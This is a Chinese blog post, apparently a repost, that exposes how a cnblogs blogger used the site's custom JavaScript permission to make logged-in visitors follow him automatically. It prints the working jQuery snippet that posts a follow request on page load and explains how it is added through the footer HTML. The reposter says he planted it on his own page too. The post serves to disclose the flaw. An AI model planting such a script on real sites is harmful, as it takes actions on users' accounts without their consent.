我其实也是博客园的真爱粉,我在 CSDN 有我博客园链接,在博客园有我 CSDN 链接,因为我博客园可以自定义,就比如加个导航,浏览博客时更加方便,但是反过来想其实真爱你博客的不一定有多少,人们习惯都是使用 百度,谷歌简单直接,但是 CSDN 肯定也有人发现,有些博客质量不怎么的,建议像博客园那样开通账号一回事,博客权限另申请,严加审核。
再者 CSDN 和 博客园的搜索引擎优化,还是有差距的,我 CSDN 和博客园名字都是:肖朋伟,但是不管在百度或者谷歌,第一页基本都是 博客园的链接,CSDN 偶尔看到。
撤多了,看正题,这篇文章系转载
当你点开这篇文章的时候,如果你已经登录博客园账号,那么你自动回成为我的博客园粉丝,因为我加了自动关注的js,这里并不是想骗粉丝,希望博客园能重视这个bug。明天早上我会删除掉这段js的。
- 起因>发现一个骗粉丝的人
- 经过>他是如何实现骗粉丝的
- 我的一些思考
发现一个骗粉丝的人
今天下班,打开博客园的时候看到这篇文章,点了进去,感觉排版不错,自定义的界面体验非常不错,职业性地点击了主页看了看,发现了一个问题,于是乎有了这篇文章。
至于是什么问题,还是看图说话吧!
这时我并没有感觉到任何奇怪的地方,感觉体验不错,排版和内容也还不错,我是搞.net 的,所以对于java只是粗略地看了一下,文章写的还是可以的,于是我习惯性地点击了他的主页,我发现我已经关注了他,对于java,很难有充分的理由让我去关注他。那么问题来了,“刚刚点击了那篇文章,是如何实现自动关注,骗粉丝的呢”!
其实也就是刷小聪明骗粉丝而已。
他是如何实现骗粉丝的
点击那篇文章,打开F12,发现了两段自定义的yueshutong.js和guanzhu.js,他申请了自定义的js的权限,可以引入外部的js。第一段yueshutong.js 并没有发现任何奇怪的地方。作为学生来说这段代码写的还是可以的,100分的话我可以给80分。
至于第二段guanzhu.js 非常简单直接,不过现在他已经删除掉了,刷小聪明做贼心虚,不过我已经截取下来了,没图说个jb啊!
连博客园的站长都成了他的粉丝了,之前看的时候发现dudu都成了他的粉丝,不过现在dudu取关了,这骗真的是可以的,满分!
就是这段guanzhu.js ,懂点js的都知道在网页加载的时候自动发送ajax请求关注,这个参数cb_blogUserGuid就是用户的唯一标识,可以在每篇文章的左键查看源码里面找的到
$(document).ready(function(){
var json = {"blogUserGuid":cb_blogUserGuid};
$.ajax({
type: "POST",
url: "/mvc/Follow/FollowBlogger.aspx",
data: JSON.stringify(json),
contentType: "application/json; charset=utf-8",
dataType: "text",
success: function(data) {
//console.log("..")
}
});
})
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
为了验证正确性,随便打开一篇文章就可以查看“关注我”按钮的js事件,
这个fllow方法在blog-common.js中
至于实现的方式,其实非常low,就是申请js权限,在设置>页脚html代码 添加这段js
“<script src="//files.cnblogs.com/files/zhangmumu/test.js/>”
在网页加载的时候自动发送关注的ajax请求。
我的思考
- 从技术上来说,这并没有任何难度,博客园给我们开放js权限,是让更好自定义自己的博客,当然博客园肯定是知道这个bug的,而极少部分人却拿这个去“骗粉丝”,也许是为了好玩而已。我还是希望博客园能够修复这个bug,毕竟这个bug实实在在地存在。
- 从社区的环境来说,博客园是最“纯粹的社区”,可能没有之一。
“是一个面向开发者的知识分享社区。自创建以来,博客园一直致力并专注于为开发者打造一个纯净的技术交流社区,推动并帮助开发者通过互联网分享知识,从而让更多开发者从中受益。博客园的使命是帮助开发者用代码改变世界”
搞.net的,有一些博客园的粉丝,说明还是有一定的含金量的,是一个面向开发者的知识分享社区,,前段时间比较火的是github简历造假,给中国的github社区造成不少的影响,搞.net的,有一些博客园的粉丝,说明还是有一定的含金量的。希望每个在博客园的博主都成为这个为数不多的“干净”社区的维护者和参与者(有点拍马屁了)。